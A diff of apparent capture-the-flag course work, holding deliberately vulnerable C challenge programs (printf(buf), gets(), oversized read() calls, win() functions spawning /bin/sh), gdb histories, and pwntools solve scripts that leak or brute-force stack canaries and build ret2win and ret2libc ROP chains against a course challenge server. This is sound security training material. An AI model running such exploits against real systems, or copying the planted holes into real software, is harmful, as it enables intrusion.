Second CTFs part

canary/01_pastry_shop/.gdb_history

@@ -0,0 +1,56 @@
+quit
+disass vuln
+b *0x00000000004013fa
+disass vuln
+r
+print $rax
+disass vuln
+info registers
+c
+clear
+r
+x/10x $rsp
+x/10x $rsp - 0x8
+disass vuln
+x/10x $rbp - 0x8
+x/10x $fs
+x/10x 0x28
+x/10x $rbp
+x/10x $rbp - 0x8
+x/10x ($rbp - 0x8)
+r
+quit
+disass vuln
+b *0x00000000004013fa
+r
+print $rax
+info registers
+disass vuln
+b *0x00000000004013f6
+r
+r
+r
+r
+disass vuln
+r
+n
+r
+r
+disass vuln
+b *0x00000000004013f5
+r
+print $rax
+n
+print $rax
+n
+print $rax
+info registers
+print 0x7fffffffda28
+gdb config context.nb_lines_stack 32
+gef config context.nb_lines_stack 32
+r
+n
+r
+r
+oaacpaacqaacraacsaactaacuaacvaacwaacxaacyaac
+quit

canary/01_pastry_shop/solve.py

@@ -0,0 +1,30 @@
+#!/usr/bin/env python3
+from pwn import *
+
+# elf = context.binary = ELF('./pastry_shop', checksec=False)
+
+# %lx.%lx.%lx.%lx.%lx.%lx.%lx.%lx
+CANARY_IDX = 23
+OFFSET_TO_CANARY = 72
+# Space between canary and RIP
+OFFSET_TO_RIP = 88
+
+# p = process(elf.path)
+p = remote("offsec.m0lecon.it", 13538)
+p.recvuntil(b"dear customer?\n")
+p.sendline(f"%{CANARY_IDX}$lx".encode())
+leak = p.recvline().strip()
+canary = int(leak, 16)
+log.info(f"canary = {canary:#x}")
+win_addr = 0x00000000004012C2
+p.recvuntil(b"to order?\n")
+
+payload = flat(
+    b"A" * OFFSET_TO_CANARY,
+    p64(canary),
+    b"B" * (OFFSET_TO_RIP - OFFSET_TO_CANARY - 8),
+    p64(win_addr),
+)
+
+p.send(payload)
+p.interactive()

canary/02_fortune_cookie/.gdb_history

@@ -0,0 +1,48 @@
+disass vuln
+disass main
+b *0x00000000004018ef
+r
+print $rbp
+print $rdx
+r
+r
+run
+quit
+r
+r
+quit
+r
+disass main
+quit
+disass 
+disass handle_client
+quit
+disass handle_data
+disass vuln
+disass main
+r
+quit
+disass read_data
+b *0x00000000004015d3
+r
+quit
+b win
+r
+r
+r
+quit
+set follow-fork-mode child
+disass read_data
+b *0x00000000004015dc
+r
+r
+quit
+set follow-fork-mode child
+disass win
+b win
+r
+r
+exit
+disass win
+b *0x0000000000401530
+r

canary/02_fortune_cookie/flag

@@ -0,0 +1 @@
+prova prova

canary/02_fortune_cookie/solve.py

@@ -0,0 +1,56 @@
+#!/usr/bin/env python3
+import time
+
+from pwn import *
+
+HOST, PORT = "offsec.m0lecon.it", 13569
+# HOST, PORT = '127.0.0.1', 4444
+OFFSET_TO_CANARY = 72
+OFFSET_TO_RIP = OFFSET_TO_CANARY + 8 + 8
+
+elf = ELF("./fortune_cookie", checksec=False)
+
+# bruteforce canary on fork server
+known = b"\x00"
+"""for i in range(7):
+    for bval in range(256):
+        guess = known + bytes([bval])
+        payload = b"A" * OFFSET_TO_CANARY + guess
+
+        io = remote(HOST, PORT, level='error')
+        io.recvuntil(b"wish\n")
+        io.send(payload)
+        try:
+            data = io.recv(timeout=0.2)
+        except EOFError:
+            data = b""
+        io.close()
+
+        if b"OK" in data:
+            known = guess
+            log.success(f"byte {i+1}: {bval:02x}")
+            break
+"""
+# canary = u64(known)
+canary = 0x4F03B0B41EBDDB00
+log.info(f"Canary: {canary:#x}")
+# gadget = 0x4013cf
+gadget = 0x000000000040190D
+gadget4 = 0x0000000000401016
+gadget3 = 0x0000000000401438
+gadget2 = 0x40101A
+io = remote(HOST, PORT)
+io.recvuntil(b"wish\n")
+payload = flat(
+    b"A" * OFFSET_TO_CANARY,
+    p64(canary),
+    # b'B' * 8,
+    b"B" * (OFFSET_TO_RIP - OFFSET_TO_CANARY - 8),
+    p64(gadget2),  # Gadget
+    p64(elf.sym.win),
+)
+io.send(payload)
+# io.recvline()
+io.interactive()
+# io.sendline(b'ls')
+io.recvline()

canary/03_space_station/.gdb_history

@@ -0,0 +1,27 @@
+r
+disass vuln
+b *0x000055555555534e
+r
+quit
+disass vuln
+b vuln
+r
+n
+n
+disass vuln
+b *0x000055555555535e
+disass vuln
+n
+c
+disass main
+n
+disass main
+disass vuln
+disass init
+disass start
+quit
+disass vuln
+disass main
+disass vuln
+disass main
+quit

canary/03_space_station/find_canary.py

@@ -0,0 +1,20 @@
+#!/usr/bin/env python3
+from pwn import *
+import re
+
+elf = context.binary = ELF("./space_station", checksec=False)
+
+#p = process(elf.path)
+context.log_level='warn'
+offset = 0x139e
+for i in range(35):
+    p = process(elf.path)
+    p.recvline()
+    p.sendline(f"%{i}$lx") 
+    val = p.recvline().split(b":")[1].strip()
+    print(f"Pos:{i} Value: {val}")
+    if( val[-2:] == b"00"):
+        print(f"Possible canary: {val} at position: {i}")
+    p.shutdown()
+
+#p.interactive()

canary/03_space_station/main.c

@@ -0,0 +1,33 @@
+#include <stdio.h>
+#include <stdlib.h>
+#include <unistd.h>
+
+void setup() {
+    setvbuf(stdin, NULL, _IONBF, 0);
+    setvbuf(stdout, NULL, _IONBF, 0);
+    setvbuf(stderr, NULL, _IONBF, 0);
+}
+
+void win() {
+    printf("Mission accomplished! Opening airlock:\n");
+    system("/bin/sh");
+}
+
+void vuln() {
+    char buf[64];
+    
+    printf("Enter your astronaut ID: ");
+    read(0, buf, 63);
+    buf[63] = '\0';
+    printf(buf);
+    
+    printf("\nSubmit your mission log: ");
+    read(0, buf, 256);
+}
+
+int main() {
+    setup();
+    printf("Welcome aboard the Space Station!\n");
+    vuln();
+    return 0;
+}

canary/03_space_station/solve.py

@@ -0,0 +1,41 @@
+#!/usr/bin/env python3
+import re
+
+from pwn import *
+
+CANARY_POS = 15
+RETURN_POS = 17  # (Seen from the find_canary script and gdb rel value)
+CANARY_OFF = 72
+# Next instruction after the main() calls vuln()
+main_rel = 0x139E  # Relative address after the vuln call in main
+win_rel = 0x1275
+elf = context.binary = ELF("./space_station", checksec=False)
+
+# p = process(elf.path)
+p = remote("offsec.m0lecon.it", 13583)
+
+p.sendline(f"%{CANARY_POS}$lx.%{RETURN_POS}$lx".encode())
+p.recvline()
+rawout = p.recvline().split(b":")[1].strip()
+canary_raw = rawout.split(b".")[0]
+ret_raw = rawout.split(b".")[1]
+
+canary = int(canary_raw, 16)
+# Return address on the stack of the vuln() function
+ret = int(ret_raw, 16)
+# Base address end with three 000 because is the beginning of a memory page
+base_addr = ret - main_rel
+print(f"{p64(canary)} and {p64(base_addr)}")
+print(f"Base address: {hex(base_addr)}")
+payload = flat(
+    b"A" * CANARY_OFF,
+    p64(canary),
+    b"B" * 8,
+    p64(base_addr + 0x000000000000101A),  # ret gadget
+    p64(base_addr + win_rel),
+)
+p.send(payload)
+print(p.recvline())
+print(p.recvline())
+
+p.interactive()

canary/04_secret_library/.gdb_history

@@ -0,0 +1,21 @@
+quit
+quit
+r
+disass vuln
+b *0x0000000000401364
+R
+R
+r
+disass vuln
+r
+disass vuln
+r
+n
+disass vuln
+r
+n
+disass vuln
+b *0x000000000040135b
+r
+r
+quit

canary/04_secret_library/find_canary.py

@@ -0,0 +1,17 @@
+#!/usr/bin/env python3
+from pwn import *
+import re
+
+elf = context.binary = ELF("./secret_library", checksec=False)
+
+context.log_level='warn'
+for i in range(35):
+    p = process(elf.path)
+    p.recvline()
+    p.sendline(f"%{i}$lx") 
+    val = p.recvline().split(b",")[1].strip()
+    if( val[-2:] == b"00"):
+        print(f"Possible canary: {val} at position: {i}")
+    p.shutdown()
+
+#p.interactive()

canary/04_secret_library/main.c

@@ -0,0 +1,34 @@
+#include <stdio.h>
+#include <stdlib.h>
+#include <unistd.h>
+
+void setup() {
+    setvbuf(stdin, NULL, _IONBF, 0);
+    setvbuf(stdout, NULL, _IONBF, 0);
+    setvbuf(stderr, NULL, _IONBF, 0);
+}
+
+void win() {
+    printf("You've discovered the forbidden section!\n");
+    system("/bin/sh");
+}
+
+void vuln() {
+    char buf[128];
+    
+    printf("Sign the guestbook: ");
+    read(0, buf, 127);
+    buf[127] = '\0';
+    printf("Hello, ");
+    printf(buf);
+    
+    printf("\nLeave a review: ");
+    read(0, buf, 512);
+}
+
+int main() {
+    setup();
+    printf("Welcome to the Secret Library!\n");
+    vuln();
+    return 0;
+}

canary/04_secret_library/solve.py

@@ -0,0 +1,26 @@
+#!/usr/bin/env python3
+from pwn import *
+
+CANARY_POS = 23 
+CANARY_OFF = 136
+elf = context.binary = ELF("./secret_library", checksec=False)
+
+#p = process(elf.path)
+p = remote('offsec.m0lecon.it', 13501)
+print(p.recvline())
+p.sendline(f"%{CANARY_POS}$lx".encode())
+val = p.recvline().split(b",")[1].strip()
+print(val)
+canary = int(val, 16)
+print(p.recvline())
+payload = flat(
+    b'A' * CANARY_OFF,
+    p64(canary),
+    b'B' * 8, #pass rbp
+    p64(0x000000000040101a),
+    p64(0x0000000000401262),
+)
+p.send(payload)
+print(p.recvline())
+#print(p.recvline())
+p.interactive()

canary/05_cafe_menu/.gdb_history

@@ -0,0 +1,7 @@
+disass vuln
+b *0x0000000000401355
+r
+bkaablaabmaabnaaboaabpaabqaabraabsaabtaabuaabvaabwaabxaabyaab
+quit
+disass vuln
+quit

canary/05_cafe_menu/main.c

@@ -0,0 +1,44 @@
+#include <stdio.h>
+#include <stdlib.h>
+#include <unistd.h>
+
+static void setup(void) {
+    setvbuf(stdin, NULL, _IONBF, 0);
+    setvbuf(stdout, NULL, _IONBF, 0);
+    setvbuf(stderr, NULL, _IONBF, 0);
+}
+
+__attribute__((noreturn)) static void win(void) {
+    puts("Chef's special unlocked!");
+    char *argv[] = {"/bin/sh", NULL};
+    execve("/bin/sh", argv, NULL);
+    _exit(0);
+}
+
+static void vuln(void) {
+    struct {
+        char menu[48];
+        volatile unsigned int idx;
+    } data;
+
+    data.idx = 0;
+
+    printf("Enter today's specials (send 0xff to finish):\n");
+
+    while (data.idx < 200) {
+        char c;
+        if (read(STDIN_FILENO, &c, 1) != 1) break;
+        if ((unsigned char)c == 0xff) break;
+        data.menu[data.idx] = c;
+        data.idx++;
+    }
+
+    printf("Menu updated!\n");
+}
+
+int main(void) {
+    setup();
+    printf("Welcome to the Cafe!\n");
+    vuln();
+    return 0;
+}

canary/05_cafe_menu/solve.py

@@ -0,0 +1,22 @@
+#!/usr/bin/env python3
+from pwn import *
+
+elf = context.binary = ELF("./cafe_menu", checksec=False)
+
+BUF_LEN = 48
+# CANARY_OFF = 50
+AFTER_CANARY = 0x3F
+# p = process(elf.path)
+p = remote("offsec.m0lecon.it", 13563)
+print(p.recvline())
+# We can overwrite IDX to make it write on the stack after the canary position
+payload = flat(
+    b"A" * 48,
+    b"\x3f",  # After canary offset found
+    b"A" * 8,  # Skip rbp
+    p64(0x401262),  # win
+    b"\xff",
+)
+p.send(payload)
+print(p.recvline())
+p.interactive()

canary/06_weather_station/main.c

@@ -0,0 +1,129 @@
+#include <arpa/inet.h>
+#include <netinet/in.h>
+#include <signal.h>
+#include <stdio.h>
+#include <stdlib.h>
+#include <string.h>
+#include <sys/socket.h>
+#include <sys/types.h>
+#include <sys/wait.h>
+#include <unistd.h>
+
+static void setup(void) {
+    setvbuf(stdin, NULL, _IONBF, 0);
+    setvbuf(stdout, NULL, _IONBF, 0);
+    setvbuf(stderr, NULL, _IONBF, 0);
+}
+
+static void reap_children(int sig) {
+    (void)sig;
+    while (waitpid(-1, NULL, WNOHANG) > 0) {
+    }
+}
+
+__attribute__((noreturn)) static void win(void) {
+    puts("Storm warning! Here's your emergency shell:");
+    char *argv[] = {"/bin/sh", NULL};
+    execve("/bin/sh", argv, NULL);
+    _exit(0);
+}
+
+static void read_query(int fd) {
+    char query[48];
+
+    ssize_t n = read(fd, query, 256);
+    if (n <= 0) {
+        return;
+    }
+}
+
+static void handle_client(int fd) {
+    dup2(fd, STDIN_FILENO);
+    dup2(fd, STDOUT_FILENO);
+    dup2(fd, STDERR_FILENO);
+
+    alarm(2);
+
+    char location[16];
+
+    const char *banner = "Welcome to the Weather Station!\n";
+    (void)write(fd, banner, strlen(banner));
+
+    const char *prompt1 = "Enter your location: ";
+    (void)write(fd, prompt1, strlen(prompt1));
+    (void)read(fd, location, sizeof(location));
+
+    const char *prompt2 = "Submit your forecast query: ";
+    (void)write(fd, prompt2, strlen(prompt2));
+
+    read_query(fd);
+
+    const char *ok = "Forecast sent!\n";
+    (void)write(fd, ok, strlen(ok));
+}
+
+int main(int argc, char **argv) {
+    setup();
+
+    int port = 5555;
+    if (argc == 2) {
+        port = atoi(argv[1]);
+        if (port <= 0 || port > 65535) {
+            fprintf(stderr, "Invalid port\n");
+            return 1;
+        }
+    }
+
+    signal(SIGCHLD, reap_children);
+
+    int s = socket(AF_INET, SOCK_STREAM, 0);
+    if (s < 0) {
+        perror("socket");
+        return 1;
+    }
+
+    int opt = 1;
+    setsockopt(s, SOL_SOCKET, SO_REUSEADDR, &opt, sizeof(opt));
+
+    struct sockaddr_in addr;
+    memset(&addr, 0, sizeof(addr));
+    addr.sin_family = AF_INET;
+    addr.sin_addr.s_addr = htonl(INADDR_ANY);
+    addr.sin_port = htons((uint16_t)port);
+
+    if (bind(s, (struct sockaddr *)&addr, sizeof(addr)) < 0) {
+        perror("bind");
+        return 1;
+    }
+
+    if (listen(s, 16) < 0) {
+        perror("listen");
+        return 1;
+    }
+
+    printf("Weather Station listening on 0.0.0.0:%d\n", port);
+
+    while (1) {
+        int fd = accept(s, NULL, NULL);
+        if (fd < 0) {
+            perror("accept");
+            continue;
+        }
+
+        pid_t pid = fork();
+        if (pid < 0) {
+            perror("fork");
+            close(fd);
+            continue;
+        }
+
+        if (pid == 0) {
+            close(s);
+            handle_client(fd);
+            close(fd);
+            _exit(0);
+        }
+
+        close(fd);
+    }
+}

canary/06_weather_station/solve.py

@@ -0,0 +1,58 @@
+#!/usr/bin/env python3
+from pwn import *
+import time
+
+context.binary = elf = ELF('./weather_station', checksec=False)
+
+p = process(elf.path)
+
+HOST, PORT = 'offsec.m0lecon.it', 13559
+#HOST, PORT = '127.0.0.1', 5555
+OFFSET_TO_CANARY = 56
+#
+#OFFSET_TO_RIP = OFFSET_TO_CANARY + 8 + 8
+
+known = b"\x00"
+
+for i in range(7):
+    for bval in range(256):
+        guess = known + bytes([bval])
+        payload = b"A" * OFFSET_TO_CANARY + guess
+
+        io = remote(HOST, PORT, level='error')
+        io.recvuntil(b'location: ')
+        io.sendline(b"Safe")
+        io.recvuntil(b'query: ')
+        io.send(payload)
+
+        try:
+            data = io.recv(timeout=0.2)
+        except EOFError:
+            data = b""
+        io.close()
+        if b"Forecast sent!" in data:
+            known = guess
+            log.success(f"byte {i+1}: {bval:02x}")
+            break
+
+canary = u64(known)
+
+log.info(f"Canary: {canary:#x}")
+
+
+io = remote(HOST, PORT, level='error')
+io.recvuntil(b'location: ')
+io.sendline(b"Safe")
+io.recvuntil(b'query: ')
+
+payload = flat(
+    b'A' * OFFSET_TO_CANARY,
+    p64(canary),
+    b'B' * 8,
+    p64(0x000000000040101a),
+    p64(0x0000000000401530),
+)
+io.send(payload)
+print(io.recvline())
+print(io.sendline(b'cat /home/user/flag'))
+io.interactive()

lab1_2_recap/01_parrot_cage/.gdb_history

@@ -0,0 +1,14 @@
+r
+quit
+r
+disass vuln
+r
+disass vuln
+b *0x000000000040131b
+r
+quit
+disass vuln
+b *0x00000000004012a9
+r
+n
+disass vuln

lab1_2_recap/01_parrot_cage/main.c

@@ -0,0 +1,48 @@
+#define _GNU_SOURCE
+#include <stdio.h>
+#include <stdlib.h>
+#include <string.h>
+#include <unistd.h>
+#include <stdint.h>
+
+__attribute__((noinline))
+void win(void) {
+    char *flag = getenv("FLAG");
+    puts(flag);
+    fflush(stdout);
+    _exit(0);
+}
+
+__attribute__((noinline))
+void vuln(void) {
+    char buf[64];
+
+    puts("=== Polly's Parrot Cage ===\n"
+         "Polly repeats everything you say!\n"
+         "Type a message and Polly will squawk it back.\n"
+         "Say 'bye' when you're done chatting.\n");
+    fflush(stdout);
+
+    for (;;) {
+        ssize_t n = read(STDIN_FILENO, buf, 0x200);
+        if (n < 0) {
+            perror("read");
+            exit(1);
+        }
+        if (n == 0) {
+            break;
+        }
+        if (n >= 3 && buf[0] == 'b' && buf[1] == 'y' && buf[2] == 'e') {
+            break;
+        }
+        puts(buf);
+    }
+}
+
+int main(void) {
+    setvbuf(stdout, NULL, _IONBF, 0);
+    setvbuf(stdin, NULL, _IONBF, 0);
+    vuln();
+    puts("Polly says goodbye! *squawk*");
+    return 0;
+}

lab1_2_recap/01_parrot_cage/solve.py

@@ -0,0 +1,54 @@
+#!/usr/bin/env python3
+from pwn import *
+
+elf = context.binary = ELF('./parrot_cage', checksec=False)
+
+OFFSET_TO_CANARY = 72
+#OFFSET_TO_RIP = 88
+
+#p = process(elf.path)
+p = remote('offsec.m0lecon.it',13531)
+print(p.recvline())
+print(p.recvline())
+print(p.recvline())
+print(p.recvline())
+#print(p.recvline())
+#print(p.recvuntil(b'chatting\n'))
+#p.send(b"A"*30+b'\x00'+b"B"*30)
+#For the future: the first byte in the canary is \x00, so I need
+# to overwrite it in order to print the canary
+payload = flat(
+    #b'\x00',
+    b"A" * (OFFSET_TO_CANARY+1),
+    #b'\x00',
+    #p64(canary),
+    #b"B"  * 30,
+    #b"B" * ( OFFTSET_TO_RIP - OFFSET_TO_CANARY - 8),
+    #p64(win_addr),
+)
+p.send(payload)
+p.recvline()
+
+#add the missing 00 byte and convert to int
+canary_raw = b'\x00'+p.recvline()[(OFFSET_TO_CANARY+1):OFFSET_TO_CANARY+1+7].strip()
+print(canary_raw)
+canary = int.from_bytes(canary_raw, byteorder='little')
+print(f"Canary:{p64(canary)}")
+payload = flat(
+    b'A'* OFFSET_TO_CANARY,
+    p64(canary),
+    b'B' * 8, #RBP
+    p64(0x000000000040101a), #gadget
+    p64(0x0000000000401236), #win
+)
+p.send(payload)
+p.sendline(b'bye')
+print(p.recvline())
+#print(p.recvline())
+p.interactive()
+#print(b"Recv "+p.recvline())
+#print(p.recvline())
+
+"""p.send(payload)
+p.sendline(b'bye')
+p.interactive()"""

lab1_2_recap/02_enchanted_forest/main(1).c

@@ -0,0 +1,42 @@
+#include <stdio.h>
+#include <stdlib.h>
+#include <unistd.h>
+
+static void setup(void) {
+    setvbuf(stdin, NULL, _IONBF, 0);
+    setvbuf(stdout, NULL, _IONBF, 0);
+    setvbuf(stderr, NULL, _IONBF, 0);
+}
+
+static void default_spell(void) {
+    puts("Poof! A tiny spark flies out... not very impressive.");
+}
+
+__attribute__((noreturn)) static void win(void) {
+    puts("Ancient magic awakens! The forest bows to you.");
+    char *argv[] = {"/bin/sh", NULL};
+    execve("/bin/sh", argv, NULL);
+    _exit(0);
+}
+
+static void vuln(void) {
+    struct {
+        char incantation[64];
+        void (*cast)(void);
+    } spell;
+
+    spell.cast = default_spell;
+
+    printf("Whisper your incantation:\n");
+    read(STDIN_FILENO, spell.incantation, 128);
+
+    printf("Casting spell...\n");
+    spell.cast();
+}
+
+int main(void) {
+    setup();
+    printf("Welcome to the Enchanted Forest!\n");
+    vuln();
+    return 0;
+}

lab1_2_recap/02_enchanted_forest/solve.py

@@ -0,0 +1,18 @@
+#!/usr/bin/env python3
+from pwn import *
+
+elf = context.binary = ELF("./canary_callback", checksec=False)
+
+# p = process(elf.path)
+p = remote("offsec.m0lecon.it", 13575)
+print(p.recvuntil(b"incantation:"))
+# There is canary but is after the function pointer
+win = 0x00000000004012A3
+payload = flat(
+    b"A" * 64,
+    p64(win),
+)
+p.send(payload)
+p.interactive()
+# p.recvline()
+# p.recvline()

lab1_2_recap/03_lighthouse/main(2).c

@@ -0,0 +1,111 @@
+#define _GNU_SOURCE
+#include <arpa/inet.h>
+#include <errno.h>
+#include <netinet/in.h>
+#include <signal.h>
+#include <stdbool.h>
+#include <stdio.h>
+#include <stdlib.h>
+#include <string.h>
+#include <sys/socket.h>
+#include <sys/types.h>
+#include <sys/wait.h>
+#include <unistd.h>
+
+static void die(const char *msg) {
+    perror(msg);
+    exit(1);
+}
+
+static void setup_stdio(void) {
+    setvbuf(stdout, NULL, _IONBF, 0);
+    setvbuf(stderr, NULL, _IONBF, 0);
+}
+
+__attribute__((used))
+void win(void) {
+    system("/bin/sh");
+}
+
+__attribute__((noinline))
+void vuln(void) {
+    char buf[128];
+    puts("Enter your signal log entry: ");
+    read(STDIN_FILENO, buf, 0x200);
+}
+
+__attribute__((noinline))
+void handle_client(int fd) {
+    FILE *f = fdopen(fd, "r+");
+    if (!f) die("fdopen");
+    dup2(fd, 0); dup2(fd, 1); dup2(fd, 2);
+
+    setup_stdio();
+    puts("=== Lighthouse Control Panel ===");
+    puts("1) Record signal log");
+    puts("2) Disconnect");
+    printf("> ");
+    char choice[8];
+    if (!fgets(choice, sizeof choice, f)) return;
+    switch (choice[0]) {
+        case '1':
+            vuln();
+            puts("Log entry recorded. Over and out.");
+            return;
+        case '2':
+            puts("Disconnecting. Fair winds.");
+            return;
+        default:
+            puts("Unknown command. Disconnecting.");
+            break;
+    }
+}
+
+static void reap(int sig) {
+    (void)sig;
+    while (waitpid(-1, NULL, WNOHANG) > 0) {}
+}
+
+int main(int argc, char **argv) {
+    (void)argc; (void)argv;
+    setup_stdio();
+
+    signal(SIGCHLD, reap);
+
+    int port = 9001;
+    const char *env_port = getenv("PORT");
+    if (env_port) port = atoi(env_port);
+
+    int s = socket(AF_INET, SOCK_STREAM, 0);
+    if (s < 0) die("socket");
+    int one = 1;
+    setsockopt(s, SOL_SOCKET, SO_REUSEADDR, &one, sizeof(one));
+
+    struct sockaddr_in addr = {0};
+    addr.sin_family = AF_INET;
+    addr.sin_addr.s_addr = htonl(INADDR_ANY);
+    addr.sin_port = htons((uint16_t)port);
+
+    if (bind(s, (struct sockaddr *)&addr, sizeof(addr)) < 0) die("bind");
+    if (listen(s, 16) < 0) die("listen");
+
+    printf("[*] Lighthouse beacon active on port %d\n", port);
+    for (;;) {
+        struct sockaddr_in cli; socklen_t cl = sizeof cli;
+        int c = accept(s, (struct sockaddr *)&cli, &cl);
+        if (c < 0) {
+            if (errno == EINTR) continue;
+            die("accept");
+        }
+        pid_t pid = fork();
+        if (pid < 0) die("fork");
+        if (pid == 0) {
+            // Child
+            close(s);
+            handle_client(c);
+            close(c);
+            _exit(0);
+        }
+        close(c);
+    }
+}

lab1_2_recap/03_lighthouse/solve.py

@@ -0,0 +1,62 @@
+#!/usr/bin/env python3
+from pwn import *
+
+CANARY_OFF = 136
+elf = context.binary = ELF('./lighthouse', checksec=False)
+
+#p = remote('127.0.0.1',9001)
+#p = remote('offsec.m0lecon.it',13575)
+HOST = 'offsec.m0lecon.it'
+PORT = 13535
+
+known = b"\x00"
+
+for i in range(7):
+    for bval in range(256):
+        guess = known + bytes([bval])
+        payload = b"A" * CANARY_OFF + guess
+
+        io = remote(HOST, PORT, level='error')
+
+        io.recvuntil(b'>')
+        io.sendline(b'1')
+        #print(io.recvline())
+        io.recvuntil(b'entry: \n')
+        io.send(payload)
+
+        try:
+            data = io.recv(timeout=0.2)
+        except EOFError:
+            data = b""
+        io.close()
+        if b"Log entry recorded. Over and out." in data:
+            known = guess
+            log.success(f"byte {i+1}: {bval:02x}")
+            break
+
+canary = u64(known)
+
+#canary = 0xaa0f007629225000
+
+log.info(f"Canary: {canary:#x}")
+
+
+io = remote(HOST, PORT, level='error')
+
+io.recvuntil(b'>')
+io.sendline(b'1')
+        #print(io.recvline())
+io.recvuntil(b'entry: \n')
+payload = flat(
+    b'A' * (CANARY_OFF),
+    p64(canary),
+    b'B' * 8, #rbp,
+    p64(0x000000000040101a), #ret
+    p64(0x0000000000401630), #win
+)
+io.send(payload)
+io.sendline(b'cat /home/user/flag')
+print(io.recvline())
+#io.recvline()
+#p.recvline()
+#p.recvline()

lab1_2_recap/04_the_whispering_wall/main(3).c

@@ -0,0 +1,30 @@
+#include <stdio.h>
+#include <stdlib.h>
+#include <unistd.h>
+
+void setup() {
+    setvbuf(stdin, NULL, _IONBF, 0);
+    setvbuf(stdout, NULL, _IONBF, 0);
+    setvbuf(stderr, NULL, _IONBF, 0);
+}
+
+void win() {
+    puts("How did you fit through that tiny window?!");
+    system("/bin/sh");
+}
+
+void vuln() {
+    char whisper[16];
+
+    puts("Psst! This is the whispering wall.");
+    puts("Only tiny messages allowed... or are they?");
+    puts("whisper:");
+
+    gets(whisper);
+}
+
+int main() {
+    setup();
+    vuln();
+    return 0;
+}

lab1_2_recap/04_the_whispering_wall/solve.py

@@ -0,0 +1,20 @@
+#!/usr/bin/env python3
+from pwn import *
+
+elf = context.binary = ELF('./whispering_wall', checksec=False)
+
+p = process(elf.path)
+p = remote('offsec.m0lecon.it',13566)
+p.recvuntil(b'whisper:\n')
+payload = flat(
+    b'A' * 16,
+    b'B' * 8,
+    p64(0x000000000040101a), #ret
+    p64(0x00000000004011fb),#win
+)
+p.send(payload)
+p.interactive()
+#print(p.recvline())
+#io.recvline()
+#p.recvline()
+#p.recvline()

ret2libc/01_neon_diner/solve.py

@@ -0,0 +1,25 @@
+from pwn import *
+
+context.binary = elf = ELF('./ret2plt', checksec=False)
+
+OFFSET_TO_RIP = 72
+
+#p = process(elf.path)
+p = remote("offsec.m0lecon.it", 13501)
+
+pop_rdi = elf.sym.pop_rdi_ret
+binsh = next(elf.search(b'/bin/sh\x00'))
+ret = ROP(elf).find_gadget(['ret']).address
+
+payload = flat(
+    b'A'*OFFSET_TO_RIP,
+    p64(ret),
+    p64(pop_rdi),
+    p64(binsh),
+    p64(elf.plt.system),
+)
+
+p.recvuntil(b'order?\n')
+p.send(payload)
+p.interactive()
+

ret2libc/02_dusty_scrolls/.gdb_history

@@ -0,0 +1,13 @@
+r
+r
+quit
+p puts
+start
+p puts
+quit
+disass vuln
+b *0x0000000000401215
+c
+r
+got
+quit

ret2libc/02_dusty_scrolls/solve.py

@@ -0,0 +1,51 @@
+#!/usr/bin/env python3
+from pwn import *
+
+context.binary = elf = ELF("./ret2libc_leak", checksec=False)
+# Change if on server
+
+libc = ELF("libc.so.6", checksec=False)
+# This version of libc has put that ends with 0x00 so it's unprintable in local
+# libc = ELF("/usr/lib/libc.so.6", checksec=False)
+OFFSET_TO_RIP = 72
+POP_RDI = 0x4011DB
+RET = 0x40101A
+PUTS_PLT = 0x401060
+# PUTS_PLT = elf.plt['puts']
+PUTS_GOT = elf.got["puts"]
+MAIN = 0x401227
+# MAIN = elf.sym['main']
+
+BINSH = next(elf.search(b"/bin/sh\x00"))
+p = process(elf.path)
+# p = remote("offsec.m0lecon.it", 13507)
+# -------- Stage 1: leak puts --------
+p.recvuntil(b"looking for?\n")
+stage1 = flat(
+    b"A" * OFFSET_TO_RIP,
+    p64(POP_RDI),
+    p64(BINSH),
+    # p64(PUTS_GOT),
+    p64(PUTS_PLT),
+    p64(MAIN),
+)
+p.send(stage1)
+p.recvline()  # consume "Let me check..."
+leaked = p.recvline().strip()
+leak_puts = u64(leaked.ljust(8, b"\x00"))
+log.info(f"puts leak = {leak_puts:#x}")
+libc.address = leak_puts - libc.symbols["puts"]
+log.info(f"libc base = {libc.address:#x}")
+# -------- Stage 2: system("/bin/sh") --------
+system_addr = libc.symbols["system"]
+p.recvuntil(b"looking for?\n")
+stage2 = flat(
+    b"A" * OFFSET_TO_RIP,
+    p64(RET),
+    p64(POP_RDI),
+    p64(0x402008),  # addr /bin/sh
+    p64(libc.symbols["system"]),  # address of system
+)
+p.send(stage2)
+p.interactive()
+# p.recvline()

ret2libc/02_dusty_scrolls/test.py

@@ -0,0 +1,54 @@
+#!/usr/bin/env python3
+from pwn import *
+
+context.binary = elf = ELF("./ret2libc_leak", checksec=False)
+# Change if on server
+
+# libc = ELF("libc.so.6", checksec=False)
+# This version of libc has put that ends with 0x00 so it's unprintable in local
+libc = ELF("/usr/lib/libc.so.6", checksec=False)
+OFFSET_TO_RIP = 72
+POP_RDI = 0x4011DB
+RET = 0x40101A
+PUTS_PLT = 0x401060
+# PUTS_PLT = elf.plt['puts']
+# PUTS_GOT = elf.got["puts"]
+PUTS_GOT = elf.got["read"]
+MAIN = 0x401227
+# MAIN = elf.sym['main']
+
+BINSH = next(elf.search(b"What book are you looking for?\x00"))
+# BINSH = next(elf.search(b"/bin/sh\x00"))
+p = process(elf.path)
+# p = remote("offsec.m0lecon.it", 13507)
+# -------- Stage 1: leak puts --------
+p.recvuntil(b"looking for?\n")
+stage1 = flat(
+    b"A" * OFFSET_TO_RIP,
+    p64(POP_RDI),
+    p64(PUTS_GOT),
+    p64(PUTS_PLT),
+    p64(MAIN),
+)
+p.send(stage1)
+p.recvline()  # consume "Let me check..."
+# print(p.recvline())
+leaked = p.recvline().strip()
+leak_puts = u64(leaked.ljust(8, b"\x00"))
+log.info(f"puts leak = {leak_puts:#x}")
+libc.address = leak_puts - libc.symbols["puts"]
+log.info(f"libc base = {libc.address:#x}")
+# -------- Stage 2: system("/bin/sh") --------
+"""
+system_addr = libc.symbols["system"]
+p.recvuntil(b"looking for?\n")
+stage2 = flat(
+    b"A" * OFFSET_TO_RIP,
+    p64(RET),
+    p64(POP_RDI),
+    p64(0x402008),  # addr /bin/sh
+    p64(libc.symbols["system"]),  # address of system
+)
+p.send(stage2)
+p.interactive()
+# p.recvline()"""

ret2libc/03_feedback_portarl/.gdb_history

@@ -0,0 +1,109 @@
+r
+r
+quit
+r
+quit
+ls
+disass main
+disass setup
+disass vuln
+b vuln
+r
+quit
+disass vuln
+b vuln
+r
+c
+r
+c
+r
+c
+r
+c
+r
+c
+r
+r
+c
+r
+c
+p $sp
+p $rsp
+r
+p $sp
+p $sp+1
+p $sp+8
+r
+r
+r
+quit
+b vuln
+r
+p $sp
+p $sp+8
